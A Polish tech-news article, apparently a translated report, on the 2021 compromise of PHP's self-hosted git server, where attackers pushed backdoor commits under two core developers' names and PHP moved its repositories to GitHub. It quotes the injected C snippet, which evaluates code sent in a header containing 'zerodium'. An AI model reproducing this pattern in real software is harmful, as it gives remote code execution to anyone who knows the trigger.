Różności i nowinki technologia

Hakerzy backdoorują do kodu źródłowego PHP po włamaniu się do wewnętrznego serwera git

Rysowane drzwi prowadzą do ściany z kodem komputerowym.

Jak twierdzą członkowie projektu open source, haker włamał się na serwer używany do dystrybucji języka programowania PHP i dodał backdoor do kodu źródłowego, który naraziłby strony internetowe na całkowite przejęcie.

Dwie aktualizacje przesłane na serwer PHP Git w ciągu weekendu dodały wiersz, który, jeśli byłby uruchamiany przez witrynę internetową opartą na PHP, umożliwiałby odwiedzającym bez autoryzacji wykonanie wybranego kodu. Złośliwe commity tutaj i tutaj dały kodowi możliwość wstrzyknięcia kodu odwiedzającym, którzy mieli słowo „zerodium” w nagłówku HTTP.

Zhakowano PHP.net, kod został zhakowany

Zatwierdzenia zostały dokonane w repozytorium php-src pod nazwami kont dwóch znanych programistów PHP, Rasmusa Lerdorfa i Nikity Popova. „Nie wiemy jeszcze, jak dokładnie to się stało, ale wszystko wskazuje na kompromis z serwerem git.php.net (a nie na kompromis z indywidualnym kontem git)” – napisał Popov w ogłoszeniu opublikowanym w niedzielę wieczorem.

W następstwie kompromisu Popov powiedział, że opiekunowie PHP doszli do wniosku, że ich samodzielna infrastruktura Git stanowi niepotrzebne zagrożenie bezpieczeństwa. W rezultacie zaprzestaną udostępniania serwera git.php.net i uczynią GitHub oficjalnym źródłem repozytoriów PHP. W przyszłości wszystkie zmiany w kodzie źródłowym PHP będą dokonywane bezpośrednio na GitHub, a nie na git.php.net.

Szkodliwe zmiany zostały ujawnione nie później niż w niedzielę wieczorem przez deweloperów, w tym Markusa Staaba, Jake’a Birchallfa i Michaela Voříška, którzy analizowali zatwierdzenie dokonane w sobotę. Aktualizacja, która rzekomo naprawiała literówkę, została dokonana na koncie używającym nazwy Lerdorf. Krótko po pierwszym odkryciu Voříšek zauważył drugie złośliwe zatwierdzenie, które zostało wykonane pod nazwą konta Popov. To rzekomo cofnąć poprzednią poprawkę literówki.

Oba zatwierdzenia dodały te same wiersze kodu:

onvert_to_string(enc);
	if (strstr(Z_STRVAL_P(enc), "zerodium")) {
		zend_try {
			zend_eval_string(Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS: sold to zerodium, mid 2017");

Zerodium jest brokerem, który kupuje exploity od badaczy i sprzedaje je agencjom rządowym do wykorzystania w dochodzeniach lub do innych celów. Nie jest jasne, dlaczego zatwierdzenie odnosiło się do Zerodium. Prezes firmy, Chaouki Bekrar, w poniedziałek powiedziany na Twitterze, że nie było w to zamieszane.

„Pozdrowienia dla trolla, który umieścił ‘Zerodium’ w dzisiejszych zatwierdzonych przez gita zatwierdzeniach PHP” – napisał. „Oczywiście nie mamy z tym nic wspólnego. Prawdopodobnie badacze, którzy znaleźli ten błąd / exploit, próbowali sprzedać go wielu podmiotom, ale nikt nie chciał go kupić, więc spalili go dla zabawy.

Zła karma

Przed kompromisem grupa PHP obsługiwała cały dostęp do zapisu w repozytorium na własnym serwerze git http://git.php.net/, używając czegoś, co Popov nazwał „rodzimym” systemem zwanym Karma. Zapewniało programistom różne poziomy uprawnień dostępu w zależności od wcześniejszych wkładów. W międzyczasie GitHub był repozytorium lustrzanym.

Teraz grupa PHP rezygnuje z hostowanej i zarządzanej samodzielnie infrastruktury git i zastępuje ją GitHubem. Zmiana oznacza, że ​​GitHub jest teraz repozytorium „kanonicznym”. Grupa PHP nie będzie już używać systemu Karma. Zamiast tego, współautorzy będą musieli być częścią organizacji PHP w GitHub i muszą używać uwierzytelniania dwuskładnikowego dla kont z możliwością dokonywania zatwierdzeń.

Wydarzenie w ten weekend nie jest pierwszym, kiedy serwery php.net zostały naruszone z zamiarem przeprowadzenia ataku na łańcuch dostaw. Na początku 2019 roku powszechnie używane rozszerzenie PHP i repozytorium aplikacji tymczasowo zamknęły większość witryny po wykryciu hakerów, którzy zastąpili głównego menedżera pakietów złośliwym. Deweloperzy grup powiedzieli, że każdy, kto pobrał menedżera pakietów w ciągu ostatnich sześciu miesięcy, powinien otrzymać nową kopię.

PHP obsługuje około 80 procent witryn internetowych. Nie ma doniesień o witrynach internetowych wprowadzających złośliwe zmiany w środowiskach produkcyjnych.

Zmiany zostały prawdopodobnie wprowadzone przez ludzi, którzy chcieli chwalić się swoim nieautoryzowanym dostępem do serwera PHP Git, a nie ci, którzy próbowali faktycznie otwierać strony internetowe korzystające z PHP, powiedział HD Moore, współzałożyciel i dyrektor generalny platformy do wykrywania sieci Rumble.

„Wygląda na to, że napastnicy trollują Zerodium lub próbują sprawiać wrażenie, że kod był znacznie dłużej przesterowany” – powiedział Arsowi. „Tak czy inaczej, spędzałbym dużo czasu na przeglądaniu poprzednich zatwierdzeń, gdybym miał jakiekolwiek zainteresowanie PHP w zakresie bezpieczeństwa”.



Zostaw komentarz

Maciek Luboński
Z wykształcenia jestem kucharzem , ale to nie przeszkadza mi pisać dla Was tekstów z wielu ciekawych dziedzin , których sam jestem fanem.Piszę dużo i często nie na tak jak trzeba , ale co z tego skoro tak naprawdę liczy się pasja.

Najlepsze recenzje

Video

gallery

Facebook